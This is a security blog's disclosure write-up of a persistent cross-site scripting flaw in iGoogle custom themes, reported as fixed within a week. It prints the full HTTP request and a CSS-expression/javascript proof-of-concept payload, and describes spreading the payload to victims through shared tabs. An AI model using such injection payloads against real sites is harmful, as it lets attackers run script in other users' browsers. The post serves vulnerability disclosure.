Kos SecurityA blog about security.

Hacking Google – Part 2

Vulnerability: Cross Site Scripting

Affects: Any browser that supports javascript to be executed from CSS. IE6, IE7, and the latest version of Opera were tested.

iGoogle (http://www.google.com/ig) was vulnerable to persistent XSS via CSS injection on a custom theme.

Authentication Status: both unauth and auth

 

URL used in attack
http://www.google.com/ig

 

Payload:
POST /ig/skin_submit_xhr?tmprivacy=1&et=4cdb0f0bQKHcNSc5&referrer=tm HTTP/1.1

{"title":"test","author":"test","description":"","skin":
        [{"background_image":"');}body{background-image:expression(alert(document.domain));
        -o-link:'javascript:alert(document.domain)';-o-link-source:current}/*","logo_color":"white","logo_hex_color":"FFFFFF",
        "background_color":"D1ECF9","gadget_border":"6685b8","gadget_top_background":"6685b8",
        "gadget_top_text":"CEECFC","tab_background":"D1ECF9","tab_border":"93BDD1",
        "tab_text":"3A5787","selected_text":"3A5787","gadget_icon":"00a9ff","icon_color":"00a9ff"}]}

How it’s reflected on the page:

When the iGoogle page is loaded, if theme (which is attached to a tab) is selected, it will trigger instantly.
If the tab is not selected, if a user selects the tab, it will then trigger.

GET /ig/skin_xml_to_css?hl=en&gl=us&v2=1&url=http://www.google.com/ig/tm%3Foutput%3Dxml%26te%3DFYvZBahVsoU&skindx=ix:0&fp=lUTDcevwYRs HTTP/1.1

....');}body{background-image:expression(alert(document.domain));-o-link:'javascript:alert(document.domain)';
-o-link-source:current}@import 'data:,*{x:expression(alert(document.domain))}';/*') no-repeat top center;}/* google logo */....

The Danger

A user can share a tab with other users via invitation. If the victim accepts the tab invitation, then the theme with the attached malicious CSS will be added to their page.

Resolution

This issue was resolved in about a week.

No comments posted.

Leave a Reply

Your email address will not be published. Required fields are marked *


+ 7 = eleven

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>